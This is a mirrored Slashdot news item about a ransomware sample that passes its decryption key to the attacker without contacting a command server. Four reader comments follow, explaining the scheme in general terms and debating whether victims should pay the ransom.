Slashdot Mirror

← Back to Stories (view on slashdot.org)

Crypto-Ransomware Encrypts Files "Offline"

Posted by timothy on from the back-channels dept.

An anonymous reader writes: Ransomware comes in various forms, and not all ransomware encrypts files — some just block computers until the ransom is paid. When the file encryption feature is included, the encryption key is usually sent to the malware's C&C server, which is controlled by the crooks — but not always. Researchers have recently analyzed a crypto-ransomware sample that demonstrated an alternative method of encrypting files and delivering the key (i.e., the information required to discover the right key) to the criminal behind the scheme — it doesn't need to contact a C&C to receive an encryption key or to send it to the crook.

4 of 54 comments (clear)

  1. Stupid summary by Kjella · · Score: 4, Insightful

    So instead of the malware actively sending the key, the victim has to send one of the encrypted files instead, big whoop. The method is the same, encrypt your files and put the key in an message encrypted for the malware author. Who does the sending is a technicality.

    --
    Live today, because you never know what tomorrow brings
  2. Transmission of the Key by Coren22 · · Score: 5, Informative

    So, to save others having to click the link, the method of the key transmission is like this:

    The first part of every file contains the key encrypted with the ransomer's private key, the victim needs to send at least one file to the ransomer, which he then uses to extract the key to send it to the victim.

    The ransomware also has some odd features, from TFA:

    Once downloaded and run on the machine, the ransomware encrypts all personal files and renames them. The new names follow the following format: email-[address to contact].ver-[Ransomware internal version].id-[Machine identifier]-[Date & Time][Random digits].randomname-[Random name given to the encrypted file].cbf (example: email-Seven_Legion2@aol.com.ver-CL 1.0.0.0.id-NPEULAODSHUJYMAPESHVKYNBQETHWKZOBQFT-10@6@2015 9@53@19AM5109895.randomname-EFWMERGVKYNBPETHVKZNBQETHWKZNB.RGV.cbf).

    The researcher also recommends paying up, as there does not appear to be any way around this one.

    --
    APK likes to ask for responses to the same things over and over. Maybe he just likes the responses?
    1. Re:Transmission of the Key by Anonymous Coward · · Score: 2, Insightful

      The correct reaction however is to treat it like you accidentally wiped the disk: Restore from backup or, if you don't have a backup, learn your lesson and start making backups. Giving in to extortion just breeds more extortion.

  3. Dang... by truck_soccer · · Score: 2

    So they were able to contact the author of the malware, but are unable to find him and bring him to justice?